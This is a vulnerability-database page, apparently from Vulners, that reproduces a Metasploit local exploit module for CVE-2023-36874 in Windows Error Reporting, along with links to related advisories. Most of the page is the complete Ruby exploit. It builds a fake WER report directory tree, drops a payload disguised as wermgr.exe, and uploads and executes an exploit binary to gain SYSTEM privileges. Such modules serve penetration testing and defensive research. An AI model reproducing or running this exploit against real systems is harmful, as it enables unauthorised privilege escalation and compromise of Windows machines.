Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Error Reporting Local Privilege Elevation Exploit

🗓️ 27 Sep 2023 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 387 Views

Microsoft Error Reporting local Privilege Elevatio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2023-36874
11 Jul 202300:00
attackerkb
Information Security Automation		Microsoft Patch Tuesday July 2023: Vulristics improvements, Office RCE, SFB SmartScreen and Outlook, EoP MSHTML and ERS, other RCEs
28 Jul 202309:37
avleonov
BDU FSTEC		The vulnerability of the Windows Error Reporting service in Windows operating systems allows a perpetrator to escalate their privileges.
26 Jul 202300:00
bdu_fstec
Circl		CVE-2023-36874
11 Jul 202318:10
circl
CISA KEV Catalog		Microsoft Windows Error Reporting Service Privilege Escalation Vulnerability
11 Jul 202300:00
cisa_kev
CISA		 CISA Adds Five Known Vulnerabilities to Catalog
11 Jul 202312:00
cisa
CNNVD		Microsoft Windows Error Reporting 安全漏洞
11 Jul 202300:00
cnnvd
CVE		CVE-2023-36874
11 Jul 202317:03
cve
Cvelist		CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability
11 Jul 202317:03
cvelist
GithubExploit		Exploit for Link Following in Microsoft
24 Aug 202322:24
githubexploit
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
        'Description' => %q{
          This module takes advantage of a bug in the way Windows error reporting opens the report
          parser.  If you open a report, Windows uses a relative path to locate the rendering program.
          By creating a specific alternate directory structure, we can coerce Windows into opening an
          arbitrary executable as SYSTEM.
          If the current user is a local admin, the system will attempt impersonation and the exploit will
          fail.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Filip Dragović (Wh04m1001)', # PoC
          'Octoberfest7', # PoC
          'bwatters-r7' # msf module
        ],
        'Platform' => ['win'],
        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-07-11',
        'References' => [
          ['CVE', '2023-36874'],
          ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
          ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
          ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options([
      OptString.new('EXPLOIT_NAME',
                    [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
      OptString.new('REPORT_DIR',
                    [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
      OptString.new('SHADOW_DRIVE',
                    [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
      OptInt.new('EXECUTE_DELAY',
                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  # When we pass the directory value to the mkdir method, the mkdir method
  # passes the reference to the string containing the directory.
  # We do a lot of string manipulation in this module, so this is a quick
  # hack to make sure that despite what we do with the string after we create
  # the directory, it is  the actual directory we created that gets sent to
  # the cleanup methods.
  def clone_mkdir(dir)
    mkdir(dir.clone)
  end

  def upload_error_report
    wer_archive_dir = get_env('PROGRAMDATA')
    vprint_status(wer_archive_dir)
    wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
    report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
    report_filename = "#{report_dir}\\Report.wer"
    vprint_status("Creating #{report_dir}")
    clone_mkdir(report_dir)
    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
    vprint_status("Writing Report to #{report_filename}")
    write_file(report_filename, wer_report_data)
  end

  def build_shadow_archive_dir(shadow_base_dir)
    wer_archive_dir = shadow_base_dir
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << '\\ProgramData\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'Microsoft\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'Windows\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'WER\\'
    clone_mkdir(wer_archive_dir)
    wer_archive_dir << 'ReportArchive\\'
    clone_mkdir(wer_archive_dir)
    report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
    clone_mkdir(report_dir)
    return report_dir
  end

  def upload_shadow_report(shadow_archive_dir)
    report_filename = "#{shadow_archive_dir}\\Report.wer"
    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
    vprint_status("Writing bad Report to #{report_filename}")
    write_file(report_filename, wer_report_data)
  end

  def build_shadow_system32(shadow_base_dir)
    shadow_win32 = "#{shadow_base_dir}\\system32"
    vprint_status("Creating #{shadow_win32}")
    clone_mkdir(shadow_win32)
    return shadow_win32
  end

  def upload_payload(shadow_win32)
    payload_bin = generate_payload_exe
    payload_filename = "#{shadow_win32}\\wermgr.exe"
    vprint_status("Writing payload to #{payload_filename}")
    write_file(payload_filename, payload_bin)
  end

  def upload_execute_exploit(exploit_path, shadow_path, home_dir)
    vprint_status("shadow_path = #{shadow_path}")
    exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
    write_file(exploit_path, exploit_bin)
    sleep datastore['EXECUTE_DELAY']
    vprint_status("Exploit uploaded to #{exploit_path}")
    cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
    output = cmd_exec(cmd, nil, 30)
    vprint_status(output)
  end

  def check
    # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
    version = get_version_info
    vprint_status("OS version: #{version}")
    return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2

    return Exploit::CheckCode::Safe
  end

  def exploit
    fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
    fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
    shadow_dir = datastore['SHADOW_DRIVE']
    home_dir = get_env('HOMEDRIVE')
    shadow_path = "#{home_dir}\\#{shadow_dir}"
    vprint_status("Shadow Path = #{shadow_path}")
    upload_error_report
    shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
    upload_shadow_report(shadow_archive_dir)
    shadow_system32 = build_shadow_system32(shadow_path.dup)
    upload_payload(shadow_system32)
    sleep datastore['EXECUTE_DELAY']
    exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
    exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
    if shadow_dir.length > 64
      fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
    end
    upload_execute_exploit(exploit_path, shadow_dir, home_dir)
    print_warning("Manual deletion of #{shadow_path} may be required")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Sep 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.17.8
EPSS0.70224
metasploitlocal exploitwindows error reportingprivilege elevationvulnerabilitymicrosoftcrowdstrikezero-daycve-2023-36874buffer overflowreport parserfile dropperartifact on diskexploit launch
387